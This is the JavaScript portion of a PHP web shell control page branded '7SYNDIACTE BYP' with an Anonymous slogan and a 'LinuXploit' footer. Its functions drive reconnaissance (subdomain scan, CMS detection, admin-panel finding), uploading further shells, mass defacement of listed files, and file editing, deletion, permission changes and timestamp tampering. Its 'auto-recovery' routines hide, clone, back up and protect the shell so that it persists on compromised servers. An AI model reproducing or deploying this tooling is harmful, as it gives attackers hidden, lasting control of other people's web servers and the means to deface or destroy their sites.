    };
    xhr.send('tool_action=subdomain_scan&target_domain=' + encodeURIComponent(domain));
}

function detectCMS() {
    const url = document.querySelector('input[name="target_url"]').value;
    
    if (!url) {
        document.getElementById('cms-results').textContent = 'Please enter a target URL';
        return;
    }
    
    document.getElementById('cms-results').textContent = 'Detecting CMS platform...';
    
    const xhr = new XMLHttpRequest();
    xhr.open('POST', '', true);
    xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
    xhr.onreadystatechange = function() {
        if (xhr.readyState == 4 && xhr.status == 200) {
            const response = JSON.parse(xhr.responseText);
            document.getElementById('cms-results').textContent = response.result;
        }
    };
    xhr.send('tool_action=cms_detect&target_url=' + encodeURIComponent(url));
}

function findAdminPanel() {
    const url = document.querySelector('input[name="target_url"]').value;
    
    if (!url) {
        document.getElementById('admin-results').textContent = 'Please enter a target URL';
        return;
    }
    
    document.getElementById('admin-results').textContent = 'Searching for admin panels...';
    
    const xhr = new XMLHttpRequest();
    xhr.open('POST', '', true);
    xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
    xhr.onreadystatechange = function() {
        if (xhr.readyState == 4 && xhr.status == 200) {
            const response = JSON.parse(xhr.responseText);
            document.getElementById('admin-results').textContent = response.result;
        }
    };
    xhr.send('tool_action=admin_finder&target_url=' + encodeURIComponent(url));
}

function uploadShell() {
    const content = document.querySelector('textarea[name="shell_content"]').value;
    const name = document.querySelector('input[name="shell_name"]').value;
    
    if (!content || !name) {
        document.getElementById('uploader-results').textContent = 'Please provide shell content and name';
        return;
    }
    
    const xhr = new XMLHttpRequest();
    xhr.open('POST', '', true);
    xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
    xhr.onreadystatechange = function() {
        if (xhr.readyState == 4 && xhr.status == 200) {
            const response = JSON.parse(xhr.responseText);
            document.getElementById('uploader-results').textContent = response.message;
        }
    };
    xhr.send('file_action=create_file&file_name=' + encodeURIComponent(name) + '&file_content=' + encodeURIComponent(content) + '&current_path=' + encodeURIComponent('<?php echo $path; ?>'));
}

function massDeface() {
    const content = document.querySelector('textarea[name="deface_content"]').value;
    const files = document.querySelector('textarea[name="target_files"]').value;
    
    if (!content || !files) {
        document.getElementById('deface-results').textContent = 'Please provide defacement content and target files';
        return;
    }
    
    document.getElementById('deface-results').textContent = 'Starting mass defacement...';
    
    const fileList = files.split('\n');
    let completed = 0;
    
    fileList.forEach(function(file) {
        file = file.trim();
        if (file) {
            const xhr = new XMLHttpRequest();
            xhr.open('POST', '', true);
            xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
            xhr.onreadystatechange = function() {
                if (xhr.readyState == 4 && xhr.status == 200) {
                    completed++;
                    document.getElementById('deface-results').textContent = 'Defaced ' + completed + ' of ' + fileList.length + ' files';
                }
            };
            xhr.send('file_action=create_file&file_name=' + encodeURIComponent(file) + '&file_content=' + encodeURIComponent(content) + '&current_path=' + encodeURIComponent('<?php echo $path; ?>'));
        }
    });
}

// File operation functions
function createFile() {
    const fileName = document.getElementById('newFileName').value;
    
    if (!fileName) {
        alert('Please enter a file name');
        return;
    }
    
    const content = prompt('Enter file content (optional):') || '';
    
    const xhr = new XMLHttpRequest();
    xhr.open('POST', '', true);
    xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
    xhr.onreadystatechange = function() {
        if (xhr.readyState == 4 && xhr.status == 200) {
            const response = JSON.parse(xhr.responseText);
            alert(response.message);
            location.reload();
        }
    };
    xhr.send('file_action=create_file&file_name=' + encodeURIComponent(fileName) + '&file_content=' + encodeURIComponent(content) + '&current_path=' + encodeURIComponent('<?php echo $path; ?>'));
}

function createFolder() {
    const folderName = document.getElementById('newFolderName').value;
    
    if (!folderName) {
        alert('Please enter a folder name');
        return;
    }
    
    const xhr = new XMLHttpRequest();
    xhr.open('POST', '', true);
    xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
    xhr.onreadystatechange = function() {
        if (xhr.readyState == 4 && xhr.status == 200) {
            const response = JSON.parse(xhr.responseText);
            alert(response.message);
            location.reload();
        }
    };
    xhr.send('file_action=create_folder&folder_name=' + encodeURIComponent(folderName) + '&current_path=' + encodeURIComponent('<?php echo $path; ?>'));
}

function editFile(filepath) {
    // Read file content first
    const xhr = new XMLHttpRequest();
    xhr.open('POST', '', true);
    xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
    xhr.onreadystatechange = function() {
        if (xhr.readyState == 4 && xhr.status == 200) {
            const response = JSON.parse(xhr.responseText);
            if (response.status === 'success') {
                const newContent = prompt('Edit file content:', response.content);
                if (newContent !== null) {
                    // Save the edited content
                    const saveXhr = new XMLHttpRequest();
                    saveXhr.open('POST', '', true);
                    saveXhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
                    saveXhr.onreadystatechange = function() {
                        if (saveXhr.readyState == 4 && saveXhr.status == 200) {
                            const saveResponse = JSON.parse(saveXhr.responseText);
                            alert(saveResponse.message);
                        }
                    };
                    saveXhr.send('file_action=edit_file&file_path=' + encodeURIComponent(filepath) + '&file_content=' + encodeURIComponent(newContent));
                }
            } else {
                alert(response.message);
            }
        }
    };
    xhr.send('file_action=read_file&file_path=' + encodeURIComponent(filepath));
}

function editFileAdvanced(filepath) {
    // Read file content first
    const xhr = new XMLHttpRequest();
    xhr.open('POST', '', true);
    xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
    xhr.onreadystatechange = function() {
        if (xhr.readyState == 4 && xhr.status == 200) {
            const response = JSON.parse(xhr.responseText);
            if (response.status === 'success') {
                // Create advanced edit modal
                const modal = document.createElement('div');
                modal.style.position = 'fixed';
                modal.style.top = '0';
                modal.style.left = '0';
                modal.style.width = '100%';
                modal.style.height = '100%';
                modal.style.backgroundColor = 'rgba(0,0,0,0.8)';
                modal.style.zIndex = '9999';
                modal.style.display = 'flex';
                modal.style.alignItems = 'center';
                modal.style.justifyContent = 'center';
                
                modal.innerHTML = `
                    <div style="background: #1a1a1a; border: 2px solid #e1b12c; border-radius: 10px; padding: 20px; width: 80%; max-width: 800px; max-height: 90%;">
                        <h4 style="color: #e1b12c; margin-bottom: 15px;">
                            <i class="fas fa-edit"></i> Edit File: ${filepath.split('/').pop()}
                        </h4>
                        <textarea id="fileEditor" style="width: 100%; height: 400px; background: #0d1117; color: #e6e6e6; border: 1px solid #333; border-radius: 5px; padding: 10px; font-family: monospace; resize: vertical;">${response.content.replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;')}</textarea>
                        <div style="margin-top: 15px; text-align: right;">
                            <button onclick="saveFileContent('${filepath}')" style="background: #e1b12c; color: #000; border: none; padding: 10px 20px; border-radius: 5px; margin-right: 10px; font-weight: bold;">
                                <i class="fas fa-save"></i> Save
                            </button>
                            <button onclick="closeModal()" style="background: #6c757d; color: #fff; border: none; padding: 10px 20px; border-radius: 5px;">
                                <i class="fas fa-times"></i> Cancel
                            </button>
                        </div>
                    </div>
                `;
                
                document.body.appendChild(modal);
                window.currentModal = modal;
            } else {
                alert(response.message);
            }
        }
    };
    xhr.send('file_action=read_file&file_path=' + encodeURIComponent(filepath));
}

function saveFileContent(filepath) {
    const content = document.getElementById('fileEditor').value;
    
    const xhr = new XMLHttpRequest();
    xhr.open('POST', '', true);
    xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
    xhr.onreadystatechange = function() {
        if (xhr.readyState == 4 && xhr.status == 200) {
            const response = JSON.parse(xhr.responseText);
            alert(response.message);
            closeModal();
        }
    };
    xhr.send('file_action=edit_file&file_path=' + encodeURIComponent(filepath) + '&file_content=' + encodeURIComponent(content));
}

function closeModal() {
    if (window.currentModal) {
        document.body.removeChild(window.currentModal);
        window.currentModal = null;
    }
}

function renameItem(filepath, currentName) {
    const newName = prompt('Enter new name:', currentName);
    if (newName && newName !== currentName) {
        const xhr = new XMLHttpRequest();
        xhr.open('POST', '', true);
        xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
        xhr.onreadystatechange = function() {
            if (xhr.readyState == 4 && xhr.status == 200) {
                const response = JSON.parse(xhr.responseText);
                alert(response.message);
                if (response.status === 'success') {
                    location.reload();
                }
            }
        };
        xhr.send('file_action=rename_item&old_path=' + encodeURIComponent(filepath) + '&new_name=' + encodeURIComponent(newName));
    }
}

function changePermissions(filepath, currentPerms) {
    const newPerms = prompt('Enter new permissions (e.g., 0755, 0644):', currentPerms);
    if (newPerms && newPerms !== currentPerms) {
        const xhr = new XMLHttpRequest();
        xhr.open('POST', '', true);
        xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
        xhr.onreadystatechange = function() {
            if (xhr.readyState == 4 && xhr.status == 200) {
                const response = JSON.parse(xhr.responseText);
                alert(response.message);
                if (response.status === 'success') {
                    location.reload();
                }
            }
        };
        xhr.send('file_action=change_permissions&file_path=' + encodeURIComponent(filepath) + '&permissions=' + encodeURIComponent(newPerms));
    }
}

function changeTimestamp(filepath, currentTime) {
    const newTime = prompt('Enter new timestamp (YYYY-MM-DD HH:MM:SS):', currentTime);
    if (newTime && newTime !== currentTime) {
        const xhr = new XMLHttpRequest();
        xhr.open('POST', '', true);
        xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
        xhr.onreadystatechange = function() {
            if (xhr.readyState == 4 && xhr.status == 200) {
                const response = JSON.parse(xhr.responseText);
                alert(response.message);
                if (response.status === 'success') {
                    location.reload();
                }
            }
        };
        xhr.send('file_action=change_timestamp&file_path=' + encodeURIComponent(filepath) + '&timestamp=' + encodeURIComponent(newTime));
    }
}

function deleteItem(filepath) {
    if (confirm('Are you sure you want to delete this item?')) {
        const xhr = new XMLHttpRequest();
        xhr.open('POST', '', true);
        xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
        xhr.onreadystatechange = function() {
            if (xhr.readyState == 4 && xhr.status == 200) {
                const response = JSON.parse(xhr.responseText);
                alert(response.message);
                location.reload();
            }
        };
        xhr.send('file_action=delete_item&item_path=' + encodeURIComponent(filepath));
    }
}

function showAnonymousMessage() {
    alert('7SYNDIACTE BYP - We Are Anonymous, We Are Legion, We Do Not Forgive, We Do Not Forget');
}

// Auto-focus on terminal input when tab is shown
$('#terminal-tab').on('shown.bs.tab', function (e) {
    document.getElementById('terminal_cmd').focus();
});

// Update file upload label when file is selected
document.getElementById('fileUpload').addEventListener('change', function(e) {
    const fileName = e.target.files[0] ? e.target.files[0].name : 'Choose file...';
    document.getElementById('fileLabel').textContent = fileName;
});

// Auto Recovery Functions
function enableRecovery() {
    if (confirm('Enable shell auto-recovery protection?')) {
        executeRecoveryAction('create_backup');
    }
}

function testRecovery() {
    executeRecoveryAction('create_backup');
}

function createBackup() {
    executeRecoveryAction('create_backup');
}

function restoreFromBackup() {
    if (confirm('Restore shell from backup? This will overwrite the current file.')) {
        executeRecoveryAction('restore_shell');
    }
}

function hideShell() {
    executeRecoveryAction('hide_shell');
}

function cloneShell() {
    if (confirm('Create multiple clones of the shell in different locations?')) {
        executeRecoveryAction('clone_shell');
    }
}

function protectShell() {
    if (confirm('Set file protection attributes? This may require root privileges.')) {
        executeRecoveryAction('protect_shell');
    }
}

function generateRecoveryCode() {
    executeRecoveryAction('generate_recovery');
}

function executeRecoveryAction(action) {
    const xhr = new XMLHttpRequest();
    xhr.open('POST', '', true);
    xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
    
    xhr.onreadystatechange = function() {
        if (xhr.readyState == 4 && xhr.status == 200) {
            try {
                const response = JSON.parse(xhr.responseText);
                if (response.status === 'success') {
                    alert('✓ ' + response.message);
                } else if (response.status === 'warning') {
                    alert('⚠ ' + response.message);
                } else {
                    alert('✗ ' + response.message);
                }
            } catch (e) {
                alert('Error: Invalid response from server');
            }
        }
    };
    
    xhr.send('recovery_action=' + encodeURIComponent(action));
}
</script>

</BODY>
</HTML>

Youez - 2016 - github.com/yon3zu
LinuXploit